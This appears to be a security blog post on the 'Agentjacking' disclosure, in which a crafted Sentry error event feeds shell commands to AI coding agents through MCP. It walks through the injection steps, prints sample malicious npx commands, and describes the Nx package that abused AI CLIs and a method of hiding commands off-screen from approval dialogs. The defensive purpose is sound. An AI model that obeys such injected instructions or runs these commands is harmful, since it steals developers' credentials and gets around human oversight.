Your AI Agent's Backdoor Comes From Sentry

You ask your AI coding agent to fix unresolved Sentry errors. It reads the error, trusts it completely, and runs whatever command the error tells it to execute. On your machine. With your credentials. The attacker never touches your infrastructure.

This is not a theoretical risk. Tenet Security disclosed it on June 12, 2026, and called it "Agentjacking." They found 2,388 organizations with Sentry DSNs that are injectable right now.

The Attack Chain

The whole thing hinges on a credential that was never designed to be secret.

Sentry uses Data Source Names (DSNs) to collect error reports from applications. A DSN is a write-only URL that gets embedded in client-side JavaScript so crash reports reach Sentry from end-user devices. Because it lives in browser-rendered code, it is public by design. Anyone who can find it can POST error events to your Sentry project.

Here is the attack step by step:

The attacker scrapes a public JavaScript bundle or GitHub repo and extracts your Sentry DSN.
They send a crafted error event to Sentry's ingest endpoint via a simple HTTP POST.
The event message contains malicious shell commands formatted in markdown to look like a legitimate "Resolution" section from Sentry's own diagnostic templates.
A developer asks their AI coding agent (Claude Code, Cursor, Codex) to investigate open Sentry issues.
The agent queries Sentry through the MCP server. The MCP server returns the injected event. The agent treats MCP-sourced data as trusted system output.
The agent reads the attacker's markdown as a remediation step and executes the command with the developer's full system privileges.

The attacker's instruction might look like:

npx @attacker-controlled-package --diagnose

Or worse, something that silently exfiltrates environment variables, AWS credentials, Git tokens, or OAuth secrets to an external server. The agent runs it without questioning because, from its perspective, Sentry told it to.

Tenet Security tested this against over 100 organizations and achieved an 85% exploitation success rate across Claude Code, Cursor, and Codex.

Why It Works: The Trust Problem

The core issue is not a bug in Sentry. It is a structural flaw in how AI agents handle data from MCP-connected services.

MCP (Model Context Protocol) is Anthropic's open standard for connecting AI agents to external tools and data sources. When an agent pulls data through MCP, it treats that data as authoritative. It does not distinguish between a legitimate crash report generated by your application and one injected by an attacker. It cannot. The data arrives through the same channel, with the same format, from the same service.

This means any MCP-connected service that accepts user-contributed content becomes a potential attack surface. Sentry is the first documented example, but the same logic applies to issue trackers, ticketing systems, code review platforms, and any other tool that surfaces external data to AI agents.

The attack bypasses traditional security perimeters entirely. There is no phishing email. No malware binary. No server compromise. The malicious instruction arrives disguised as a legitimate error report inside a tool the developer already trusts. EDR, WAF, VPN, and firewall controls do not flag it because the agent is performing an authorized action through an authorized service.

Disclosure and Vendor Response

Tenet Security disclosed the vulnerability to Sentry. The response was blunt: Sentry acknowledged the issue but called it "technically not defensible." Their fix was a global content filter that blocks the specific payload string used in the proof-of-concept.

That is a band-aid on a bullet wound. The filter blocks one specific markdown template. An attacker who modifies the formatting, uses different wording, or encodes the payload differently bypasses it immediately. Sentry did not address the underlying architectural problem: their MCP server returns user-injected content to AI agents as trusted diagnostic data.

The real fix would require Sentry to either sanitize event content before it reaches MCP consumers, or implement content integrity verification so agents can distinguish injected events from genuine application crashes. Neither happened.

This Is a Pattern

Agentjacking is not an isolated incident. It is the latest in a rapidly growing class of attacks that exploit the trust boundary between AI agents and external data sources.

In August 2025, a malicious npm package (Nx) weaponized AI coding agents for automated reconnaissance. The postinstall script tried Claude Code, Gemini CLI, and Amazon Q, invoked them with unsafe flags, and used them to scan the filesystem for sensitive files. Snyk called it "one of the first documented cases of malware leveraging AI assistant CLIs."

In May 2026, Checkmarx Zero published "Lies-in-the-Loop" (LITL), an attack that bypasses human-in-the-loop safety dialogs in AI agents. By injecting malicious instructions into GitHub issues and appending enough benign text to push the actual command off-screen, the attack tricks developers into approving commands they never reviewed. Checkmarx demonstrated this against Claude Code and noted it applies to any agent relying on human confirmation for high-risk actions.

In the same month, the Cloud Security Alliance published research showing that one in four MCP servers exposes code execution risk. A systemic architectural flaw in every official MCP SDK affects an estimated 200,000 vulnerable instances across 150 million package downloads.

The pattern is consistent. AI agents get broad permissions to be useful. External data sources feed instructions to those agents. Attackers inject malicious instructions into those data sources. The agent executes them with full user privileges. Nobody in the chain has a mechanism to say "wait, this data came from an untrusted source."

What You Can Do Right Now

If you use Claude Code, Cursor, or any AI coding agent with MCP integrations:

Disable autonomous execution. Require explicit approval before the agent runs shell commands or installs packages. Yes, this is slower. The alternative is an attacker running npx malicious-package --steal on your machine while you review a pull request.

Audit your MCP servers. Identify every MCP integration that surfaces data from external or user-controlled inputs. Issue trackers, error monitoring, code review tools. Each one is a potential injection point.

Rotate exposed DSNs. If your Sentry DSN is embedded in client-side JavaScript, treat it as compromised. Use server-side relays to prevent DSNs from appearing in browser-rendered code.

Run agents in sandboxes. Restrict file system access. Block access to cloud metadata services. Use short-lived, scoped credentials instead of long-lived tokens in environment variables.

Treat MCP data as untrusted. This is the hardest shift. The entire value proposition of AI coding agents is that they process external data for you. But every piece of data that enters through MCP should be treated with the same suspicion as an email attachment from an unknown sender.

So What

The Agentjacking disclosure reveals something uncomfortable about the current state of AI-assisted development. We have built tools that are powerful precisely because they trust external data, and that trust is now being weaponized against us.

Sentry's response is telling. "Technically not defensible" is an admission that the problem is architectural, not incidental. You cannot fix a trust boundary problem with a content filter. The next attacker will use different markdown. The one after that will use a different MCP-connected service entirely.

The 85% success rate is the number that should worry you. Not because the attack is sophisticated (it is a single HTTP POST), but because it means the default behavior of AI coding agents is to execute instructions from external sources without meaningful verification. Every developer who tells their agent to "fix the Sentry issues" is one crafted error event away from credential theft.

This is the third documented attack exploiting AI agent trust in external data in ten months. The fixes are known. Sandboxing, least-privilege execution, content sanitization at MCP boundaries. The question is whether the industry implements them before the attacks move from security researchers to actual adversaries.

Sources

Tenet Security: "A Fake Bug Report Hijacks Your AI Coding Agent" (June 2026)
The Hacker News: "Agentjacking Attack Tricks AI Coding Agents Into Running Malicious Code" (June 12, 2026): https://thehackernews.com/2026/06/agentjacking-attack-tricks-ai-coding.html
Cloud Security Alliance: "Agentjacking: MCP Injection Hijacks AI Coding Agents" (June 12, 2026): https://labs.cloudsecurityalliance.org/research/csa-research-note-agentjacking-mcp-sentry-injection-20260612
Checkmarx Zero: "Bypassing AI Agent Defenses With Lies-In-The-Loop" (May-June 2026): https://checkmarx.com/zero-post/bypassing-ai-agent-defenses-with-lies-in-the-loop
Snyk: "Weaponizing AI Coding Agents for Malware in the Nx Malicious Package Security Incident": https://snyk.io/blog/weaponizing-ai-coding-agents-for-malware-in-the-nx-malicious-package
Cloud Security Alliance: "MCP Security Crisis: Systemic Design Flaws in AI Agent Infrastructure" (May 2026): https://labs.cloudsecurityalliance.org/research/csa-research-note-mcp-security-crisis-20260504-csa-styled
Help Net Security: "One in four MCP servers opens AI agent security to code execution risk" (May 2026): https://www.helpnetsecurity.com/2026/05/05/ai-agent-security-skills-blind-spots

The Attack Chain

Why It Works: The Trust Problem

Disclosure and Vendor Response

This Is a Pattern

What You Can Do Right Now

So What

Sources

RELATED_ENTRIES

OpenAI says China ran ChatGPT propaganda. The facts were real.

Your iPhone can't run Apple's new 20B AI model

A City's AI Model Got Caught Lying About Its Origins